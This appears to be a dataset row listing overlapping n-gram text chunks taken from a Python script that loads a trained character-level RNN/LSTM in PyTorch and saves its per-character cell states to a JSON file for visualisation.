ngram
listlengths
0
67.8k
[ "n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str(", "char_to_int, config): # no trained model, train a new one if not path.exists(path.join(config.model_dir,", "for x in hidden]) # One-hot encode our data and make them Torch", "range(total_char): # for each character (time step) for j in range(config.n_layers): # for", "state hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and config.cuda:", "tuple([x.cuda() for x in hidden]) # One-hot encode our data and make them", "train a new one if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) +", "path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise", "seq = [] # store all test sequences in character form cell =", "char_cell['cell_layer_' + str(j + 1)] = [] total_char = len(cell) for i in", "1)] = [] total_char = len(cell) for i in range(total_char): # for each", "+ 1)] = [] total_char = len(cell) for i in range(total_char): # for", "for each in hidden]) inputs, targets = xp, y if config.cuda: inputs, targets", "for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate", "= tuple([x.cuda() for x in hidden]) # One-hot encode our data and make", "in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = [] total_char = len(cell) for", "flag to stop counter = 0 total = 0 for x, y in", "model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' +", "from utils import * from model import * import pdb def vis_cell(test_set, int_to_char,", "False # flag to stop counter = 0 total = 0 for x,", 
"range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size =", "1 out, hidden = char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print", "# One-hot encode our data and make them Torch tensors xp = one_hot_encode(x[i],", "each in hidden]) inputs, targets = xp, y if config.cuda: inputs, targets =", "for j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = [] total_char =", "in hidden]) inputs, targets = xp, y if config.cuda: inputs, targets = inputs.cuda(),", "# print progress information print('Processing [batch: %d, sequence: %3d]...' % (counter, i)) print(total)", "stop_flag = False # flag to stop counter = 0 total = 0", "vis_cell(test_set, int_to_char, char_to_int, config): # no trained model, train a new one if", "Please train a new model first!') # load a trained model char_rnn =", "character (time step) for j in range(config.n_layers): # for each layer char_cell['cell_layer_' +", "# allocate space for cell values for j in range(config.n_layers): char_cell['cell_layer_' + str(j", "if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str(config.n_layers) +", "= tuple([each.data for each in hidden]) inputs, targets = xp, y if config.cuda:", "config.seq_length): if stop_flag: break counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for", "config.model == 'lstm': hidden = tuple([each.data for each in hidden]) inputs, targets =", "# we'd backprop through the entire training history if config.model == 'lstm': hidden", "as np from utils import * from model import * import pdb def", "one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the", "j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = [] total_char = len(cell)", "for xs in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size 
= 1 if", "total >= 10000: stop_flag = True if stop_flag: break # write seq and", "* from model import * import pdb def vis_cell(test_set, int_to_char, char_to_int, config): #", "model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str( config.n_layers)", "xs in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available()", "+ '_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden", "Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating", "file for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) #", "test sequences in character form cell = [] # 2d array, store all", "import pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no trained model, train a", "'lstm': hidden = tuple([each.data for each in hidden]) inputs, targets = xp, y", "char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for cell values for", "= [] total_char = len(cell) for i in range(total_char): # for each character", "our data and make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y", "total_char = len(cell) for i in range(total_char): # for each character (time step)", "= [] # store all test sequences in character form cell = []", "# for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'), 'w')", "import json import os.path as path import numpy as np from utils import", "= True if stop_flag: break # write seq and cell into a json", "and make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp),", "in range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j + 
1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir,", "c_n stop_flag = False # flag to stop counter = 0 total =", "== 'lstm': hidden = tuple([each.data for each in hidden]) inputs, targets = xp,", "hidden]) total += 1 out, hidden = char_rnn(inputs, hidden) (_, c_n) = hidden", "in character form cell = [] # 2d array, store all cell state", "char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size)", "seq and cell into a json file for visualization char_cell = {} char_cell['cell_size']", "trained model! Please train a new model first!') # load a trained model", "y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the hidden state, otherwise", "stop_flag: break # write seq and cell into a json file for visualization", "initialize hidden state hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available()", "0 total = 0 for x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag:", "config.model + '_' + str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise Exception('No", "tuple([x.cuda() for x in hidden]) seq = [] # store all test sequences", "char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' +", "inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in hidden]) total", "print(total) if total >= 10000: stop_flag = True if stop_flag: break # write", "state values; each character corresponds to a row; each row is a c_n", "= one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for", "and config.cuda: hidden = tuple([x.cuda() for x in hidden]) 
# One-hot encode our", "layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'), 'w') as json_file: json.dump(char_cell,", "= inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in hidden]) total += 1", "as path import numpy as np from utils import * from model import", "+ '_' + str(config.n_layers) + '.pth')): raise Exception('No such a trained model! Please", "cell into a json file for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size", "visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space", "if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) seq =", "1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) #", "training history if config.model == 'lstm': hidden = tuple([each.data for each in hidden])", "new model first!') # load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size,", "config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in hidden])", "model, train a new one if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size)", "store all test sequences in character form cell = [] # 2d array,", "targets.cuda() hidden = tuple([each.cuda() for each in hidden]) total += 1 out, hidden", "stop_flag: break counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in", "x in hidden]) seq = [] # store all test sequences in character", "<gh_stars>0 import json import os.path as path import numpy as np from utils", "and config.cuda: hidden = tuple([x.cuda() for x in hidden]) seq = [] #", "range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = [] total_char = len(cell) for i", "xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the hidden 
state,", "json file for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq)", "to stop counter = 0 total = 0 for x, y in get_batches(test_set,", "one if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str(config.n_layers)", "hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d, sequence: %3d]...' % (counter,", "model! Please train a new model first!') # load a trained model char_rnn", "cell = [] # 2d array, store all cell state values; each character", "for x in hidden]) seq = [] # store all test sequences in", "write seq and cell into a json file for visualization char_cell = {}", "= ''.join(seq) # allocate space for cell values for j in range(config.n_layers): char_cell['cell_layer_'", "torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the hidden state, otherwise # we'd", "str(j + 1)] = [] total_char = len(cell) for i in range(total_char): #", "in hidden]) total += 1 out, hidden = char_rnn(inputs, hidden) (_, c_n) =", "in range(total_char): # for each character (time step) for j in range(config.n_layers): #", "char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str( config.n_layers) + '.pth')))", "os.path as path import numpy as np from utils import * from model", "in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size", "hidden]) inputs, targets = xp, y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda()", "import numpy as np from utils import * from model import * import", "character corresponds to a row; each row is a c_n stop_flag = False", "# Creating new variables for the hidden state, otherwise # we'd backprop through", "# load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, 
model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir,", "# for each character (time step) for j in range(config.n_layers): # for each", "for the hidden state, otherwise # we'd backprop through the entire training history", "[] total_char = len(cell) for i in range(total_char): # for each character (time", "torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) # One-hot encode", "+ '_' + str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise Exception('No such", "make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y)", "character form cell = [] # 2d array, store all cell state values;", "'_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden state", "i)) print(total) if total >= 10000: stop_flag = True if stop_flag: break #", "a new model first!') # load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int),", "the hidden state, otherwise # we'd backprop through the entire training history if", "the entire training history if config.model == 'lstm': hidden = tuple([each.data for each", "if total >= 10000: stop_flag = True if stop_flag: break # write seq", "in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter += 1 for i in", "tuple([each.data for each in hidden]) inputs, targets = xp, y if config.cuda: inputs,", "str(config.hidden_size) + '_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize", "= tuple([each.cuda() for each in hidden]) total += 1 out, hidden = char_rnn(inputs,", "tuple([each.cuda() for each in hidden]) total += 1 out, hidden = char_rnn(inputs, hidden)", "print progress information print('Processing [batch: %d, sequence: %3d]...' 
% (counter, i)) print(total) if", "hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d,", "char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'), 'w') as json_file: json.dump(char_cell, json_file)", "trained model, train a new one if not path.exists(path.join(config.model_dir, config.model + '_' +", "each character corresponds to a row; each row is a c_n stop_flag =", "for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'), 'w') as", "sequences in character form cell = [] # 2d array, store all cell", "= 1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden])", "new variables for the hidden state, otherwise # we'd backprop through the entire", ">= 10000: stop_flag = True if stop_flag: break # write seq and cell", "numpy as np from utils import * from model import * import pdb", "such a trained model! Please train a new model first!') # load a", "history if config.model == 'lstm': hidden = tuple([each.data for each in hidden]) inputs,", "Exception('No such a trained model! Please train a new model first!') # load", "stop counter = 0 total = 0 for x, y in get_batches(test_set, config.batch_size,", "'_' + str(config.n_layers) + '.pth')): raise Exception('No such a trained model! Please train", "+ str(j + 1)] = [] total_char = len(cell) for i in range(total_char):", "print('Processing [batch: %d, sequence: %3d]...' % (counter, i)) print(total) if total >= 10000:", "config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! 
# initialize hidden state hidden = char_rnn.init_hidden(1)", "if stop_flag: break counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs", "char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch:", "x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter += 1 for", "form cell = [] # 2d array, store all cell state values; each", "trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_'", "through the entire training history if config.model == 'lstm': hidden = tuple([each.data for", "[] # store all test sequences in character form cell = [] #", "space for cell values for j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)]", "each character (time step) for j in range(config.n_layers): # for each layer char_cell['cell_layer_'", "torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) seq = []", "model first!') # load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model,", "% (counter, i)) print(total) if total >= 10000: stop_flag = True if stop_flag:", "we'd backprop through the entire training history if config.model == 'lstm': hidden =", "break counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]])", "%d, sequence: %3d]...' 
% (counter, i)) print(total) if total >= 10000: stop_flag =", "each in hidden]) total += 1 out, hidden = char_rnn(inputs, hidden) (_, c_n)", "each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'), 'w') as json_file:", "backprop through the entire training history if config.model == 'lstm': hidden = tuple([each.data", "them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) #", "break # write seq and cell into a json file for visualization char_cell", "char_rnn.eval() #problem here!!!! # initialize hidden state hidden = char_rnn.init_hidden(1) # here, batch_size", "if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in", "= xp, y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda()", "char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda()", "for i in range(total_char): # for each character (time step) for j in", "= CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) +", "hidden state, otherwise # we'd backprop through the entire training history if config.model", "str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden state hidden =", "'.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden state hidden = char_rnn.init_hidden(1) # here,", "%3d]...' 
% (counter, i)) print(total) if total >= 10000: stop_flag = True if", "utils import * from model import * import pdb def vis_cell(test_set, int_to_char, char_to_int,", "train a new model first!') # load a trained model char_rnn = CharRNNs(tokens=(int_to_char,", "targets = xp, y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden =", "all test sequences in character form cell = [] # 2d array, store", "config.batch_size, config.seq_length): if stop_flag: break counter += 1 for i in range(config.seq_length): seq.extend([int_to_char[xs]", "progress information print('Processing [batch: %d, sequence: %3d]...' % (counter, i)) print(total) if total", "here, batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x", "= len(cell) for i in range(total_char): # for each character (time step) for", "hidden = tuple([x.cuda() for x in hidden]) # One-hot encode our data and", "config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for cell values for j in", "char_cell['seq'] = ''.join(seq) # allocate space for cell values for j in range(config.n_layers):", "xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables", "+= 1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden =", "y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each", "information print('Processing [batch: %d, sequence: %3d]...' % (counter, i)) print(total) if total >=", "[] # 2d array, store all cell state values; each character corresponds to", "and cell into a json file for visualization char_cell = {} char_cell['cell_size'] =", "= torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the hidden state, otherwise #", "a trained model! 
Please train a new model first!') # load a trained", "import * from model import * import pdb def vis_cell(test_set, int_to_char, char_to_int, config):", "config.cuda: hidden = tuple([x.cuda() for x in hidden]) # One-hot encode our data", "= config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for cell values for j", "a c_n stop_flag = False # flag to stop counter = 0 total", "= 0 total = 0 for x, y in get_batches(test_set, config.batch_size, config.seq_length): if", "inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in hidden]) total += 1 out,", "a json file for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] =", "x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and config.cuda:", "= char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden =", "# flag to stop counter = 0 total = 0 for x, y", "a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model +", "seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size = 1", "data and make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y =", "load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model", "new one if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' +", "# initialize hidden state hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if", "hidden = tuple([x.cuda() for x in hidden]) seq = [] # store all", "step) for j in range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j +", "for i in 
range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1) #", "torch.from_numpy(y) # Creating new variables for the hidden state, otherwise # we'd backprop", "0 for x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter +=", "config): # no trained model, train a new one if not path.exists(path.join(config.model_dir, config.model", "+ '_' + str(config.hidden_size) + '_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem", "into a json file for visualization char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq']", "each row is a c_n stop_flag = False # flag to stop counter", "= [] # 2d array, store all cell state values; each character corresponds", "= hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d, sequence: %3d]...' %", "not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')):", "* import pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no trained model, train", "corresponds to a row; each row is a c_n stop_flag = False #", "'_' + str(config.hidden_size) + '_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!!", "hidden]) # One-hot encode our data and make them Torch tensors xp =", "j in range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with", "raise Exception('No such a trained model! 
Please train a new model first!') #", "hidden = char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information", "= 0 for x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter", "(time step) for j in range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j", "xp, y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for", "[batch: %d, sequence: %3d]...' % (counter, i)) print(total) if total >= 10000: stop_flag", "{} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for cell values", "One-hot encode our data and make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys()))", "if stop_flag: break # write seq and cell into a json file for", "# here, batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for", "total += 1 out, hidden = char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy())", "for each in hidden]) total += 1 out, hidden = char_rnn(inputs, hidden) (_,", "# write seq and cell into a json file for visualization char_cell =", "hidden state hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and", "get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter += 1 for i in range(config.seq_length):", "''.join(seq) # allocate space for cell values for j in range(config.n_layers): char_cell['cell_layer_' +", "CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_'", "+ '.pth'))) char_rnn.eval() #problem here!!!! 
# initialize hidden state hidden = char_rnn.init_hidden(1) #", "is a c_n stop_flag = False # flag to stop counter = 0", "config.cuda: hidden = tuple([x.cuda() for x in hidden]) seq = [] # store", "10000: stop_flag = True if stop_flag: break # write seq and cell into", "np from utils import * from model import * import pdb def vis_cell(test_set,", "# 2d array, store all cell state values; each character corresponds to a", "for cell values for j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] =", "'_' + str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise Exception('No such a", "row; each row is a c_n stop_flag = False # flag to stop", "out, hidden = char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress", "model import * import pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no trained", "1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) seq", "cell state values; each character corresponds to a row; each row is a", "import os.path as path import numpy as np from utils import * from", "1 for i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1)", "import * import pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no trained model,", "first!') # load a trained model char_rnn = CharRNNs(tokens=(int_to_char, char_to_int), n_hidden=config.hidden_size, model=config.model, n_layers=config.n_layers)", "counter = 0 total = 0 for x, y in get_batches(test_set, config.batch_size, config.seq_length):", "range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist()) with open(path.join(config.vis_dir, 'char_cell.json'),", "def vis_cell(test_set, int_to_char, char_to_int, config): # no trained model, train a new one", "row is a c_n stop_flag = False # flag to stop counter =", "counter += 1 for i in range(config.seq_length): 
seq.extend([int_to_char[xs] for xs in x[i]]) hidden", "hidden = tuple([each.data for each in hidden]) inputs, targets = xp, y if", "sequence: %3d]...' % (counter, i)) print(total) if total >= 10000: stop_flag = True", "+ str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise Exception('No such a trained", "all cell state values; each character corresponds to a row; each row is", "here!!!! # initialize hidden state hidden = char_rnn.init_hidden(1) # here, batch_size = 1", "+ str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! # initialize hidden state hidden", "(_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d, sequence:", "path import numpy as np from utils import * from model import *", "len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new variables for the hidden", "n_layers=config.n_layers) char_rnn.load_state_dict(torch.load(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_' + str( config.n_layers) +", "total = 0 for x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break", "'.pth')): raise Exception('No such a trained model! Please train a new model first!')", "hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden", "hidden]) seq = [] # store all test sequences in character form cell", "= char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing", "+ str(config.n_layers) + '.pth')): raise Exception('No such a trained model! 
Please train a", "from model import * import pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no", "int_to_char, char_to_int, config): # no trained model, train a new one if not", "x in hidden]) # One-hot encode our data and make them Torch tensors", "values; each character corresponds to a row; each row is a c_n stop_flag", "i in range(config.seq_length): seq.extend([int_to_char[xs] for xs in x[i]]) hidden = char_rnn.init_hidden(1) # here,", "= {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for cell", "to a row; each row is a c_n stop_flag = False # flag", "if config.model == 'lstm': hidden = tuple([each.data for each in hidden]) inputs, targets", "allocate space for cell values for j in range(config.n_layers): char_cell['cell_layer_' + str(j +", "str(config.hidden_size) + '_' + str(config.n_layers) + '.pth')): raise Exception('No such a trained model!", "a row; each row is a c_n stop_flag = False # flag to", "for x, y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter += 1", "no trained model, train a new one if not path.exists(path.join(config.model_dir, config.model + '_'", "for j in range(config.n_layers): # for each layer char_cell['cell_layer_' + str(j + 1)].append(cell[i][j].tolist())", "y in get_batches(test_set, config.batch_size, config.seq_length): if stop_flag: break counter += 1 for i", "Creating new variables for the hidden state, otherwise # we'd backprop through the", "store all cell state values; each character corresponds to a row; each row", "= False # flag to stop counter = 0 total = 0 for", "in hidden]) # One-hot encode our data and make them Torch tensors xp", "char_cell = {} char_cell['cell_size'] = config.hidden_size char_cell['seq'] = ''.join(seq) # allocate space for", "= tuple([x.cuda() for x in hidden]) seq = [] # store all test", "if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in hidden]) # One-hot", 
"pdb def vis_cell(test_set, int_to_char, char_to_int, config): # no trained model, train a new", "batch_size = 1 if torch.cuda.is_available() and config.cuda: hidden = tuple([x.cuda() for x in", "json import os.path as path import numpy as np from utils import *", "cell values for j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = []", "a new one if not path.exists(path.join(config.model_dir, config.model + '_' + str(config.hidden_size) + '_'", "# no trained model, train a new one if not path.exists(path.join(config.model_dir, config.model +", "+= 1 out, hidden = char_rnn(inputs, hidden) (_, c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) #", "in x[i]]) hidden = char_rnn.init_hidden(1) # here, batch_size = 1 if torch.cuda.is_available() and", "len(cell) for i in range(total_char): # for each character (time step) for j", "array, store all cell state values; each character corresponds to a row; each", "(counter, i)) print(total) if total >= 10000: stop_flag = True if stop_flag: break", "+ str(config.hidden_size) + '_' + str( config.n_layers) + '.pth'))) char_rnn.eval() #problem here!!!! #", "otherwise # we'd backprop through the entire training history if config.model == 'lstm':", "# store all test sequences in character form cell = [] # 2d", "encode our data and make them Torch tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp,", "2d array, store all cell state values; each character corresponds to a row;", "True if stop_flag: break # write seq and cell into a json file", "inputs, targets = xp, y if config.cuda: inputs, targets = inputs.cuda(), targets.cuda() hidden", "targets = inputs.cuda(), targets.cuda() hidden = tuple([each.cuda() for each in hidden]) total +=", "+ '.pth')): raise Exception('No such a trained model! 
Please train a new model", "c_n) = hidden cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d, sequence: %3d]...'", "values for j in range(config.n_layers): char_cell['cell_layer_' + str(j + 1)] = [] total_char", "entire training history if config.model == 'lstm': hidden = tuple([each.data for each in", "str(config.n_layers) + '.pth')): raise Exception('No such a trained model! Please train a new", "tensors xp = one_hot_encode(x[i], len(char_to_int.keys())) xp, y = torch.from_numpy(xp), torch.from_numpy(y) # Creating new", "config.model + '_' + str(config.hidden_size) + '_' + str( config.n_layers) + '.pth'))) char_rnn.eval()", "for each character (time step) for j in range(config.n_layers): # for each layer", "state, otherwise # we'd backprop through the entire training history if config.model ==", "in hidden]) seq = [] # store all test sequences in character form", "hidden = tuple([each.cuda() for each in hidden]) total += 1 out, hidden =", "#problem here!!!! # initialize hidden state hidden = char_rnn.init_hidden(1) # here, batch_size =", "variables for the hidden state, otherwise # we'd backprop through the entire training", "cell.append(c_n.data.cpu().squeeze().numpy()) # print progress information print('Processing [batch: %d, sequence: %3d]...' % (counter, i))", "stop_flag = True if stop_flag: break # write seq and cell into a", "i in range(total_char): # for each character (time step) for j in range(config.n_layers):" ]
